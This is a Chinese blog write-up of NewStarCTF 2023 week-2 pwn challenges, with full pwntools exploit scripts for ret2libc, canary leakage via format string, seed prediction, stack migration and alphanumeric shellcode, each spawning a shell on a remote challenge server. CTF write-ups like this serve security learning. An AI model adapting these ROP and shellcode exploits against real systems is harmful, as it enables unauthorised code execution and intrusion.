NewStarCTF 2023 [WEEK 2] PWN

已于 2023-10-18 14:45:15 修改
阅读量1.1k 收藏 6
点赞数 12
分类专栏: PWN 文章标签: 网络安全 安全
于 2023-10-15 22:00:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/133842017
版权

简介:

第二周题目上难度了,有几题做的比较棘手不会做>_<,啊啊啊!!!

ret2libc

看题目名字ret2libc,就知道是经典的考点,泄露libc,不懂小伙伴可以去看这个上面写的很详细Pwn Pwn Pwn!!! 技巧(1),老规矩查看一下保护机制,只打开NX,并且该有的都有

ida反编译一下,发现无system,无binsh,所以我们只能通过泄露libc,构造system和binsh

exp如下:

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='debug')

#io =process('./111')
io =remote('node4.buuoj.cn',25664)
elf =ELF('./111')

got_addr = elf.got['puts']
plt_addr = elf.plt['puts']
main_addr =0x400698
rdi_addr =0x400763
ret_addr =0x400506

payload =b'A'*(0x20 +8) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main_addr)
io.recvuntil(b'Show me your magic again\n')
io.sendline(payload)

puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(puts_addr))

#put_addr =u64(io.recv(6).ljust(8,b'\x00'))
#print(hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

payload=b'a'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)
io.recvuntil(b'Show me your magic again\n')

io.sendline(payload)
io.interactive()

canary

一样是一道经典题型canary,开启了canary和NX,还有格式化字符串漏洞,经典思路就是通过格式字符串去泄露canary(如果没有格式化字符串漏洞,那只能通过溢出的形式去泄露canary),但是我们需要在 gdb 里面找到canary是第几个参数,运行文件就可以发现偏移是6

ida反编译一下,你会发现有后门函数,就不需要像上一题一样要自己泄露libc了,同时还有格式化字符串漏洞,刚好可以帮我们打印出canary的值

把断点打在printf,gdb调试寻找canary的值,你就可以发现canary是第十一个参数(这个你不会看不出来吧 -_-),接下来就是套路了

exp如下:

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./111')
p = remote('node4.buuoj.cn',27406)
elf = ELF('./111')

backdoor =0x401262
ret_addr =0x40101a

payload =b'%11$p'
p.sendline(payload)
p.recvuntil(b'Oh thanks,There is my gift:\n')
canary = int(p.recv(18), 16)

payload =b'a'*(0x30 -8) + p64(canary) + p64(0) + p64(ret_addr) + p64(backdoor) 

p.send(payload)
p.interactive()

secret number

老规矩查看一下保护机制,保护全开看着有点吓人,没事代码审计一下

认真代码审计,你就会发现只需要让 v5等于 secret就可以直接获得flag,v5是我们自己输入的,secret是一个伪随机数,所以我们只需要让时间做种子,输入伪随机数即可

exp如下:

from pwn import *
from ctypes import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./111')
p = remote('node4.buuoj.cn',28725)
elf = ELF('./111')
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

seed=libc.time(0)
libc.srand(seed)
num1=libc.rand()

p.sendlineafter(b'Give me some gift?(0/1)\n',b'0')

p.sendlineafter(b'Guess the number\n',str(num1))
p.interactive()

stack migration

只开启了NX,ida反编译,就会发现存在溢出,但是溢出的长度只有0x10,不够构造shellcode,所以只能通过栈迁移来解决这一问题

ida一下,代码审计一下,你会发现往buf里面输入数据,然后就会打印出栈地址,然后就是一个细节需要注意(红色框住的),v2地址就是栈地址 +8(这里你要明白栈是怎么存储数据的,高地址在下,低地址在上,这就是为什么加8的原因),第二个read发生了栈溢出,但是溢出的长度不足以构造rop链,所以只能进行栈迁移(leave; ret ; leave相对于是mov esp,ebp;pop ebp;ret是pop eip;)这样就简单明了了,下面就是需要注意一下接受数据(是否有空格,这里我踩坑了-_-)

exp如下:

from pwn import *
from LibcSearcher import *
context(arch='amd64',os='linux',log_level='debug')

p =remote('node4.buuoj.cn',26912)
#p =process("./111")
elf =ELF('./111')
libc=ELF('./libc.so.6')

got_addr =elf.got['puts']
plt_addr =elf.plt['puts']
rdi_addr =0x401333
ret_addr =0x4012AB
main =0x4011FB
leave =0x4012AA

p.recvuntil(b'name:\n')
p.send(b'a'*8)
p.recvuntil(b'I have a small gift for you: ')
stack =int(p.recv(14),16) +8

p.recvuntil(b'more infomation plz:\n')

payload =b'a'*8 +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(main)
payload =payload.ljust(80,b'a')
payload +=p64(stack) +p64(leave)
p.send(payload)

p.recvuntil("maybe I'll see you soon!\n")
puts_addr =u64(p.recvuntil(b'\x7f')[:6].ljust(8, b'\x00'))

libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))

p.recvuntil(b'name:\n')
p.send(b'a'*8)
p.recvuntil(b'I have a small gift for you: ')
stack =int(p.recv(14),16) +8

payload =b'a'*8 +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)
payload =payload.ljust(80,b'a')
payload +=p64(stack) +p64(leave)
p.send(payload)

p.interactive()

shellcode revenge

查看一下保护机制,开启NX和Canary,ida反编译一下,代码审计看的脑壳痛

把官方wp贴这里,后续懂了再来改

from pwn import 
*context(arch='amd64',os='linux',log_level='debug')
p = remote("node4.buuoj.cn",27904)
#p = process('./shellcodere')

payload =  b'\x33\x42\x38'  #33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload += b'\x31\x42\x30'  #31 42 30 xor DWORD PTR [rdx+0x30], eax
payload += b'\x33\x42\x37'  #33 42 38 xor eax, DWORD PTR [rdx+0x38]
payload += b'\x31\x42\x38'  #31 42 38 xor DWORD PTR [rdx+0x38], eax
payload += b'\x59'*(0x30-len(payload))  #59 pop rcx
payload += b'\x4e\x44'*2    #syscall  0x4e^0x41=0xf 0x44^0x41=0x5
payload += b'A'*8           #xor key

p.sendlineafter("magic\n",payload)
pause()

p.sendline(b'\x90'*0x50+asm(shellcraft.sh()))
p.interactive()

总结:

栈迁移这块还不是很熟悉,shellcode的相关手法还得继续学习-_-,还得继续努力啊!!!

Xzzzz911
关注
  • 12
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 8
    评论
专栏目录
pwn07.ret2syscall例题
11-11
ret2syscall例题
2023NewStarCTF-PWN-week1 WP(纯萌新视角解题思考过程,含题目可放心食用
2301_79283256的博客
10-03 424
因为程序实行分页管理机制,所以在一页内地址之间的偏移量不会变,且一页的长度为0x1000,这也就意味着任何一条指令地址的低三位数值(十六进制下)都不会变,也就是地址的低1.5字节不变。在ret2text中解决栈平衡的方案有很多种(比如加ret地址,加retn地址,加lea地址等),但此处因为溢出字节有限只能直接跳转到lea解决。地址随机化,但是程序中各个节的相对位置不变,也就是说如果你能得到运行中程序的任何一个可辨识地方的地址,就可以通过该地址与目标的偏移来获取目标的真实地址。但是前提是得想办法泄露地址。
NewStarCTF 2023 [WEEK 1] PWN
Xzzzz911的博客
10-01 1238
第一周的题目相对比较容易,pwn没有ak有点可惜,伪随机的部分弄得还不是很清楚,需要加把油伪随机部分还相对薄弱,需要加把油,绕过pie掌握的差不多了,加油,奥里给!!!
NewStarCTF 2023 公开赛道 Week1
最新发布
2401_84519960的博客
05-17 325
然后导出HTTP对象文件直接全部开导,保存到一个文件夹里然后发现了这个有点像flag的文件名打开之后发现是一串base加密后的密文,那么将它解密即可,是两层base64。
NewStarCTF 2023 WEEK3|PWN
weixin_51890658的博客
10-24 483
1.puts or system?根据名字提示把puts改为system,开了canary,但它没有用存在格式化字符串漏洞,且有n次思路:relro保护没开,可修改got表,且给了libc库,通过格式化第一次泄露got,获得system函数,第二次修改puts的got表为system即可get shellEXP:from pwn import * from LibcSearcher import * from ctypes import * sh=remote("node4.buuoj.cn",27323)
PWN · ret2text | RISC-V异构】[2023 羊城杯]login
Mr_Fmnwon的博客
09-03 712
我们context.arch经常是'i386'和'amd64',突然遇到RISC-V架构的题目,一是本地运行不了(环境没配),二是IDA无法反汇编。苦恼。一、食用工具于是找啊找。找到cutter——一款risc-v的反汇编反编译工具,然而太shi了,反编译的c代码看不了一点,全是错的。GhidraGhidra 是美国国家安全局(RSA)开源发布的软件逆向工程框架,涵盖了反汇编、反编译等工具。该工具2019年3月开源。与之对标的有windows平台下的IDA Pro和linux平台下的radare2等。
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
google_pwn2own
04-10
Pwn2own大赛简介】 Pwn2own(发音为“pawn to own”)是一个年度网络安全竞赛,由Trend Micro的Zero Day Initiative(ZDI)主办。该比赛旨在揭示并解决浏览器和其他常用软件中的安全漏洞。参赛者通常会尝试利用...
NewStarCTF公开赛week2密码学题目wp
Altering_Ji的博客
10-09 2902
NewStarCTF公开赛第二周密码学全部五道题目的wp,重点是LCG和Rabin。
VNCTF2023 WP
qq_74710163的博客
02-25 350
其功能主要是为命令行程序(cmd.exe)提供类似于Csrss.exe进程的图形子系统等功能支持,而之前在Windows XP系统中Conhost.exe的这一功能是由Csrss.exe进程“兼职”提供的,但这被认为存在不安全因素,于是微软为了提高系统安全性在06年之后发布的Vista和Win7系统中新加入Conhost.exe进程。svchost.exe是微软Windows操作系统中的系统文件,微软官方对它的解释是:svchost.exe 是从动态链接库 (DLL) 中运行的服务的通用主机进程名称。
2023 NewStarCTF --- wp
3tefanie丶zhou的博客
10-09 3339
【活着得,怎么就轻松惬意了,无需愧疚。】
记一次院赛CTF的Pwn和Misc题(入门)
CTF小白的博客
04-14 3141
目录Pwneasy pwn莽撞人反向读取Miscdrop the beats拼东东消失的50px Pwn 见到别的比赛的pwn题才幡然醒悟,已经没有比这些更简单的pwn题了。 easy pwn 首先,拿到Pwn题的第一步,看是64位还是32位 第二步 gdb看开了哪些保护 【1】Canary:Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(3...
[SWPUCTF 2023 秋季新生赛] WEB 部分题目复现
m0_63138919的博客
10-22 321
本文为2023年SWPU NSS 秋季招新赛 (校外赛道) 的部分题解复现 针对自己没做出来的
newstarctf 2023 week2
lgsyydsa的博客
11-13 157
因为get_defined_vars()被禁,用getallheaders()filter为协议读取,但是base64被过滤了,rot13也被过滤了。用convert.iconv.UTF-8.UTF-7过滤器。end()被禁就用pos(array_reverse())简单的过滤就是url编码后+要改为空格或者%20。看wp才知道是base64隐写,虽然看了也不知道。看到hint提示有泄露的信息,可能是git泄露。and or 都被过滤了,但是大写的没被过滤。发现一个bo0g1pop.php。
NewStarCTF 公开赛赛道week2 web writeup
your_friends的博客
10-02 774
利用mt_srand是伪随机数用它给出的Hint到php_mt_seed里面直接跑。如果我们post提交了一个data那么他就不会执行后面的文件从而执行我们自己的输入。由Easy::__call方法进入eeee::__clone。进入__invoke需要调用到Start::__isset。上周做题被这道sql注入整感动了,这次增加难度又来了。由Sec::__tostring进入__call方法。最终调用点在Sec::__invoke。发现我们直接在页面查询是输入了一个id。虽然加了点难度,但是还是挺简单。
NewStarCTF 2023 公开赛道 Week4
Fab1an的博客
10-30 475
snow 是一款在html嵌入隐写信息的软件,原理是通过在文本文件的末尾嵌入空格和制表位的方式嵌入隐藏信息,不同空格与制表位的组合代表不同的嵌入信息。nmap.pcap文件中有大量的SYN包,而且端口号不同,验证了Nmap的SYN Scan的工作原理。SNOW官网:The SNOW Home Page (darkside.com.au)snow在ascii文本末尾隐藏数据,可以通过插入制表符和空格是数据在浏览器不可见。snow最多添加7个空格,使每八列插入三位,文件中有许多制表符和空格。
NewStarCTF2023week3
10-20
NewStarCTF2023week3是一场CTF比赛,其中包含了各种类型的题目,例如Web、Crypto、Pwn等等。其中,引用和引用是该比赛中的两道题目的flag,而引用则是一篇关于该比赛中Crypto题目chaos的Writeup。如果你对CTF比赛感兴趣,可以尝试参加一些类似的比赛,提高自己的技能和思维能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值